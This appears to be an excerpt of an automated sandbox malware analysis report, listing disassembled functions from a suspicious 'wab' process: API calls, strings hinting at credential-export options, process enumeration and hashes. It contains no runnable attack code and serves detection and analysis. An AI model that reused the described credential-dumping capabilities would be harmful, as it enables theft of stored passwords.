                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                                                                                      • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                                      • API String ID: 2081463915-1959339147
                                                                                                                                                                                                                      • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                                                      • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                      • API String ID: 2012295524-70141382
                                                                                                                                                                                                                      • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                                                                                                                      • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                                      • API String ID: 667068680-3953557276
                                                                                                                                                                                                                      • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                      • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                                                      • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                                                      • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                                                        • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                                                        • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                                                        • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0041234D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1700100422-0
                                                                                                                                                                                                                      • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                                      • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                                                      • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                                                      • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 552707033-0
                                                                                                                                                                                                                      • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                      • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                                                                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                                                        • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                        • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040C11B
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                                                      • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                                                      • String ID: 4$h
                                                                                                                                                                                                                      • API String ID: 4066021378-1856150674
                                                                                                                                                                                                                      • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                                                      • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_snwprintf
                                                                                                                                                                                                                      • String ID: %%0.%df
                                                                                                                                                                                                                      • API String ID: 3473751417-763548558
                                                                                                                                                                                                                      • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                                                      • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                                                      • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                                                      • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                                                      • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                                                      • String ID: A
                                                                                                                                                                                                                      • API String ID: 2892645895-3554254475
                                                                                                                                                                                                                      • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                                      • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                                                                        • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                                                        • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                                                        • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                                                        • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                                                      • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                                                      • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                                                      • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                                                      • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                                                      • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                                                      • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                                                                        • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                                                      • String ID: caption
                                                                                                                                                                                                                      • API String ID: 973020956-4135340389
                                                                                                                                                                                                                      • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                                                      • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                                                                      • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                                                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                                      • API String ID: 1283228442-2366825230
                                                                                                                                                                                                                      • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                                                      • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004139B8
                                                                                                                                                                                                                        • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                                                                        • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413A00
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00413A1B
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                                                      • String ID: \systemroot
                                                                                                                                                                                                                      • API String ID: 4173585201-1821301763
                                                                                                                                                                                                                      • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                                                      • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                                                                      • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                                      • API String ID: 1284135714-318151290
                                                                                                                                                                                                                      • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                                                      • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                                                      • String ID: 0$6
                                                                                                                                                                                                                      • API String ID: 4066108131-3849865405
                                                                                                                                                                                                                      • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                                                      • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
